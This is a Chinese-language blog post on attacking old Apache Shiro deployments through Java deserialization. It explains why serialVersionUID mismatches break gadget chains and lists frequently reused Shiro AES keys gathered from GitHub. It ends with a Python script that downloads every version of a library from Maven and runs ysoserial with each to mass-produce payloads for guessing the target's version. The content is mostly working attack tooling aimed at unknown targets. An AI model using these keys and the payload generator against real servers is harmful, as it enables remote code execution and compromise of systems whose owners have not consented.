Generate all unserialize payload via serialVersionUID

简介

最近遇到了个shiro老版本的反序列漏洞, 但是只能在用URLDNS的时候能成功, 除了CommonsCollections在shiro上是不行的, 使用其他gadget的时候也失败了, 怀疑有SUID的原因。
java在打反序列时, 如果字节流中的serialVersionUID与目标服务器对应类中的serialVersionUID不同时就会出现异常。
在目标出现异常时, 如果会输出异常信息并且爆出SUID的情况下解决起来比较容易。
但是在通常场景下, 目标服务器都不会输出异常信息,
SUID不同原因基本都是因为jar包版本不同所造成(在未显示定义serialVersionUID的情况下, 会通过computeDefaultSUID来计算得出SUID, 不同版本jar包可能存在不同的方法导致算出的SUID不同),
在不会输出异常信息的场景下, 由于不知道目标服务器jar包的SUID, 所以只有使用所有可能的SUID来生成反序列payload一个一个的进行尝试,
所以这里通过获取所有jar包版本并且调用这些版本的jar包来生成反序列payload。

Shiro AES key

Shiro的反序列payload在经过base64解码, aes解密后才会进行反序列。
老版本shiro因为硬编码了默认AES的秘钥导致了问题, 但是很多时候遇到的并不都是默认的秘钥。不过很多代码都是抄抄改改, 所以从github上爬下来了一些用得比较多的的秘钥。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
4AvVhmFLUs0KTA3Kprsdag==    :   190
3AvVhmFLUs0KTA3Kprsdag== : 157
Z3VucwAAAAAAAAAAAAAAAA== : 135
2AvVhdsgUs0FSA3SDFAdag== : 114
wGiHplamyXlVB11UXWol8g== : 35
kPH+bIxk5D2deZiIxcaaaA== : 27
fCq+/xW488hMTCD+cmJ3aQ== : 9
1QWLxg+NYmxraMoxAXu/Iw== : 9
ZUdsaGJuSmxibVI2ZHc9PQ== : 8
L7RioUULEFhRyxM7a2R/Yg== : 5
6ZmI6I2j5Y+R5aSn5ZOlAA== : 5
r0e3c16IdVkouZgk1TKVMg== : 4
ZWvohmPdUsAWT3=KpPqda : 4
5aaC5qKm5oqA5pyvAAAAAA== : 4
bWluZS1hc3NldC1rZXk6QQ== : 3
a2VlcE9uR29pbmdBbmRGaQ== : 3
WcfHGU25gNnTxTlmJMeSpw== : 3
LEGEND-CAMPUS-CIPHERKEY== : 3
3AvVhmFLUs0KTA3Kprsdag == : 3

Generate payload

Ysoserial是一个maven项目, 从github上clone下来后首先编译该项目。
git clone https://github.com/frohoff/ysoserial
mvn compile
compile会编译该项目并且下载该项目所需要的jar包, 编译生成的字节码在target目录当中。
这里通过修改classpath来实现加载不同版本的jar包,
在classpath中, 两个不同版本的jar包, 实际项目中会调用的是先定义的jar包。
所以这里在修改classpath时, 将需要修改版本的jar包定义在最前, 覆盖掉ysoserial自带的jar包。
写了一个很糙的 勉强能用的小脚本。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import requests
from subprocess import Popen,PIPE
from xml.dom.minidom import *
import os

repo_url = "http://uk.maven.org/maven2/com/mchange/c3p0/maven-metadata.xml"
mvn_home = "/Users/yulegeyu/.m2/repository"
yso_path = "/tmp/ysoserial/target/classes"
gadget = "C3P0"
command = "http://www.baidu.com | base64"

res = requests.get(repo_url)

html = res.content
root = parseString(html.decode("utf-8"))

groupId = root.getElementsByTagName("groupId")[0].firstChild.data
artifactId = root.getElementsByTagName("artifactId")[0].firstChild.data

for i in root.getElementsByTagName("version"):
version = i.firstChild.data
if version.find('-pre') > -1:
continue
jar_path = mvn_home + '/' + groupId.replace('.', '/') + '/' + artifactId + '/' + version + '/' + artifactId + '-' + version + '.jar'
cmd = "mvn dependency:get -DremoteRepositories=http://repo1.maven.org/maven2/ -DgroupId=%s -DartifactId=%s -Dversion=%s" \
% (groupId, artifactId, version)
child = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
child.wait()

cmd2 = "java -cp {0}:{2}:{1}/net/iharder/base64/2.3.9/base64-2.3.9.jar:{1}/commons-io/commons-io/2.6/commons-io-2.6.jar:{1}/org/reflections/reflections/0.9.9/reflections-0.9.9.jar:{1}/com/google/guava/guava/15.0/guava-15.0.jar:{1}/com/google/code/findbugs/annotations/2.0.1/annotations-2.0.1.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-api/2.1.1/shrinkwrap-resolver-api-2.1.1.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-spi/2.1.1/shrinkwrap-resolver-spi-2.1.1.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-api-maven/2.1.1/shrinkwrap-resolver-api-maven-2.1.1.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-spi-maven/2.1.1/shrinkwrap-resolver-spi-maven-2.1.1.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-api-maven-archive/2.1.1/shrinkwrap-resolver-api-maven-archive-2.1.1.jar:{1}/org/jboss/shrinkwrap/shrinkwrap-api/1.2.1/shrinkwrap-api-1.2.1.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-impl-maven/2.1.1/shrinkwrap-resolver-impl-maven-2.1.1.jar:{1}/org/eclipse/aether/aether-api/0.9.0.M2/aether-api-0.9.0.M2.jar:{1}/org/eclipse/aether/aether-impl/0.9.0.M2/aether-impl-0.9.0.M2.jar:{1}/org/eclipse/aether/aether-spi/0.9.0.M2/aether-spi-0.9.0.M2.jar:{1}/org/eclipse/aether/aether-util/0.9.0.M2/aether-util-0.9.0.M2.jar:{1}/org/eclipse/aether/aether-connector-wagon/0.9.0.M2/aether-connector-wagon-0.9.0.M2.jar:{1}/org/apache/maven/maven-aether-provider/3.1.1/maven-aether-provider-3.1.1.jar:{1}/org/apache/maven/maven-model/3.1.1/maven-model-3.1.1.jar:{1}/org/apache/maven/maven-model-builder/3.1.1/maven-model-builder-3.1.1.jar:{1}/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar:{1}/org/apache/maven/maven-repository-metadata/3.1.1/maven-repository-metadata-3.1.1.jar:{1}/org/apache/maven/maven-settings/3.1.1/maven-settings-3.1.1.jar:{1}/org/apache/maven/maven-settings-builder/3.1.1/maven-settings-builder-3.1.1.jar:{1}/org/codehaus/plexus/plexus-interpolation/1.19/plexus-interpolation-1.19.jar:{1}/org/codehaus/plexus/plexus-utils/3.0.15/plexus-utils-3.0.15.jar:{1}/org/sonatype/plexus/plexus-sec-dispatcher/1.3/plexus-sec-dispatcher-1.3.jar:{1}/org/sonatype/plexus/plexus-cipher/1.4/plexus-cipher-1.4.jar:{1}/org/apache/maven/wagon/wagon-provider-api/2.6/wagon-provider-api-2.6.jar:{1}/org/apache/maven/wagon/wagon-file/2.6/wagon-file-2.6.jar:{1}/org/apache/maven/wagon/wagon-http-lightweight/2.6/wagon-http-lightweight-2.6.jar:{1}/org/apache/maven/wagon/wagon-http-shared/2.6/wagon-http-shared-2.6.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-impl-maven-archive/2.1.1/shrinkwrap-resolver-impl-maven-archive-2.1.1.jar:{1}/org/jboss/shrinkwrap/shrinkwrap-impl-base/1.2.1/shrinkwrap-impl-base-1.2.1.jar:{1}/org/jboss/shrinkwrap/shrinkwrap-spi/1.2.1/shrinkwrap-spi-1.2.1.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-spi-maven-archive/2.1.1/shrinkwrap-resolver-spi-maven-archive-2.1.1.jar:{1}/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.jar:{1}/org/sonatype/sisu/sisu-guice/3.1.0/sisu-guice-3.1.0-no_aop.jar:{1}/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.jar:{1}/org/codehaus/plexus/plexus-compiler-javac/2.3/plexus-compiler-javac-2.3.jar:{1}/org/codehaus/plexus/plexus-compiler-api/2.3/plexus-compiler-api-2.3.jar:{1}/org/javassist/javassist/3.19.0-GA/javassist-3.19.0-GA.jar:{1}/commons-codec/commons-codec/1.9/commons-codec-1.9.jar:{1}/org/jenkins-ci/main/remoting/2.55/remoting-2.55.jar:{1}/org/jenkins-ci/constant-pool-scanner/1.2/constant-pool-scanner-1.2.jar:{1}/org/jboss/logging/jboss-logging/3.3.0.Final/jboss-logging-3.3.0.Final.jar:{1}/org/jboss/remoting/jboss-remoting/4.0.19.Final/jboss-remoting-4.0.19.Final.jar:{1}/org/jboss/xnio/xnio-api/3.3.4.Final/xnio-api-3.3.4.Final.jar:{1}/org/jboss/jboss-common-core/2.5.0.Final/jboss-common-core-2.5.0.Final.jar:{1}/org/jboss/xnio/xnio-nio/3.3.4.Final/xnio-nio-3.3.4.Final.jar:{1}/org/jboss/sasl/jboss-sasl/1.0.5.Final/jboss-sasl-1.0.5.Final.jar:{1}/org/jboss/remotingjmx/remoting-jmx/2.0.1.Final/remoting-jmx-2.0.1.Final.jar:{1}/org/jboss/logging/jboss-logging-processor/1.2.0.Final/jboss-logging-processor-1.2.0.Final.jar:{1}/org/jboss/jdeparser/jdeparser/1.0.0.Final/jdeparser-1.0.0.Final.jar:{1}/org/jboss/marshalling/jboss-marshalling/1.4.10.Final/jboss-marshalling-1.4.10.Final.jar:{1}/org/jboss/marshalling/jboss-marshalling-river/1.4.10.Final/jboss-marshalling-river-1.4.10.Final.jar:{1}/commons-collections/commons-collections/3.1/commons-collections-3.1.jar:{1}/org/beanshell/bsh/2.0b5/bsh-2.0b5.jar:{1}/commons-beanutils/commons-beanutils/1.9.2/commons-beanutils-1.9.2.jar:{1}/commons-logging/commons-logging/1.1.1/commons-logging-1.1.1.jar:{1}/org/apache/commons/commons-collections4/4.0/commons-collections4-4.0.jar:{1}/org/codehaus/groovy/groovy/2.3.9/groovy-2.3.9.jar:{1}/org/springframework/spring-core/4.1.4.RELEASE/spring-core-4.1.4.RELEASE.jar:{1}/org/springframework/spring-beans/4.1.4.RELEASE/spring-beans-4.1.4.RELEASE.jar:{1}/org/hibernate/hibernate-core/4.3.11.Final/hibernate-core-4.3.11.Final.jar:{1}/org/jboss/logging/jboss-logging-annotations/1.2.0.Beta1/jboss-logging-annotations-1.2.0.Beta1.jar:{1}/org/jboss/spec/javax/transaction/jboss-transaction-api_1.2_spec/1.0.0.Final/jboss-transaction-api_1.2_spec-1.0.0.Final.jar:{1}/dom4j/dom4j/1.6.1/dom4j-1.6.1.jar:{1}/xml-apis/xml-apis/1.0.b2/xml-apis-1.0.b2.jar:{1}/org/hibernate/common/hibernate-commons-annotations/4.0.5.Final/hibernate-commons-annotations-4.0.5.Final.jar:{1}/org/hibernate/javax/persistence/hibernate-jpa-2.1-api/1.0.0.Final/hibernate-jpa-2.1-api-1.0.0.Final.jar:{1}/antlr/antlr/2.7.7/antlr-2.7.7.jar:{1}/org/jboss/jandex/1.1.0.Final/jandex-1.1.0.Final.jar:{1}/org/springframework/spring-aop/4.1.4.RELEASE/spring-aop-4.1.4.RELEASE.jar:{1}/aopalliance/aopalliance/1.0/aopalliance-1.0.jar:{1}/net/sf/json-lib/json-lib/2.4/json-lib-2.4-jdk15.jar:{1}/commons-lang/commons-lang/2.5/commons-lang-2.5.jar:{1}/net/sf/ezmorph/ezmorph/1.0.6/ezmorph-1.0.6.jar:{1}/commons-fileupload/commons-fileupload/1.3/commons-fileupload-1.3.jar:{1}/org/apache/wicket/wicket-util/6.23.0/wicket-util-6.23.0.jar:{1}/org/apache/shiro/shiro-core/1.4.0/shiro-core-1.4.0.jar:{1}/org/apache/shiro/shiro-lang/1.4.0/shiro-lang-1.4.0.jar:{1}/org/apache/shiro/shiro-cache/1.4.0/shiro-cache-1.4.0.jar:{1}/org/apache/shiro/shiro-crypto-hash/1.4.0/shiro-crypto-hash-1.4.0.jar:{1}/org/apache/shiro/shiro-crypto-core/1.4.0/shiro-crypto-core-1.4.0.jar:{1}/org/apache/shiro/shiro-crypto-cipher/1.4.0/shiro-crypto-cipher-1.4.0.jar:{1}/org/apache/shiro/shiro-config-core/1.4.0/shiro-config-core-1.4.0.jar:{1}/org/apache/shiro/shiro-config-ogdl/1.4.0/shiro-config-ogdl-1.4.0.jar:{1}/org/apache/shiro/shiro-event/1.4.0/shiro-event-1.4.0.jar:~/.m2/repository/com/mchange/c3p0/0.9.5.2/c3p0-0.9.5.2.jar:{1}/com/mchange/mchange-commons-java/0.2.11/mchange-commons-java-0.2.11.jar:{1}/javax/servlet/javax.servlet-api/3.1.0/javax.servlet-api-3.1.0.jar:{1}/org/apache/myfaces/core/myfaces-impl/2.2.9/myfaces-impl-2.2.9.jar:{1}/org/apache/myfaces/core/myfaces-api/2.2.9/myfaces-api-2.2.9.jar:{1}/org/apache/geronimo/specs/geronimo-atinject_1.0_spec/1.0/geronimo-atinject_1.0_spec-1.0.jar:{1}/commons-digester/commons-digester/1.8/commons-digester-1.8.jar:{1}/xalan/xalan/2.7.2/xalan-2.7.2.jar:{1}/xalan/serializer/2.7.2/serializer-2.7.2.jar:{1}/rome/rome/1.0/rome-1.0.jar:{1}/jdom/jdom/1.0/jdom-1.0.jar:{1}/org/python/jython-standalone/2.5.2/jython-standalone-2.5.2.jar:{1}/rhino/js/1.7R2/js-1.7R2.jar:{1}/javassist/javassist/3.12.0.GA/javassist-3.12.0.GA.jar:{1}/org/jboss/weld/weld-core/1.1.33.Final/weld-core-1.1.33.Final.jar:{1}/org/jboss/weld/weld-api/1.1.Final/weld-api-1.1.Final.jar:{1}/org/jboss/weld/weld-spi/1.1.Final/weld-spi-1.1.Final.jar:{1}/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar:{1}/org/jboss/spec/javax/interceptor/jboss-interceptors-api_1.1_spec/1.0.0.Beta1/jboss-interceptors-api_1.1_spec-1.0.0.Beta1.jar:{1}/org/slf4j/slf4j-ext/1.7.2/slf4j-ext-1.7.2.jar:{1}/ch/qos/cal10n/cal10n-api/0.7.7/cal10n-api-0.7.7.jar:{1}/org/jboss/interceptor/jboss-interceptor-core/2.0.0.Final/jboss-interceptor-core-2.0.0.Final.jar:{1}/org/jboss/interceptor/jboss-interceptor-spi/2.0.0.Final/jboss-interceptor-spi-2.0.0.Final.jar:{1}/javax/enterprise/cdi-api/1.0-SP1/cdi-api-1.0-SP1.jar:{1}/org/jboss/interceptor/jboss-interceptor-api/1.1/jboss-interceptor-api-1.1.jar:{1}/javax/inject/javax.inject/1/javax.inject-1.jar:{1}/javax/interceptor/javax.interceptor-api/3.1/javax.interceptor-api-3.1.jar:{1}/org/slf4j/slf4j-api/1.7.21/slf4j-api-1.7.21.jar:{1}/org/clojure/clojure/1.8.0/clojure-1.8.0.jar:{1}/com/vaadin/vaadin-server/7.7.14/vaadin-server-7.7.14.jar:{1}/com/vaadin/vaadin-sass-compiler/0.9.13/vaadin-sass-compiler-0.9.13.jar:{1}/org/w3c/css/sac/1.3/sac-1.3.jar:{1}/com/vaadin/external/flute/flute/1.3.0.gg2/flute-1.3.0.gg2.jar:{1}/com/vaadin/vaadin-shared/7.7.14/vaadin-shared-7.7.14.jar:{1}/org/jsoup/jsoup/1.8.3/jsoup-1.8.3.jar:{1}/org/mortbay/jasper/apache-el/8.0.27/apache-el-8.0.27.jar" \
" ysoserial.GeneratePayload {3} {4}".format(yso_path, mvn_home, jar_path, gadget, command)
print(version)
os.system(cmd2)

-w1351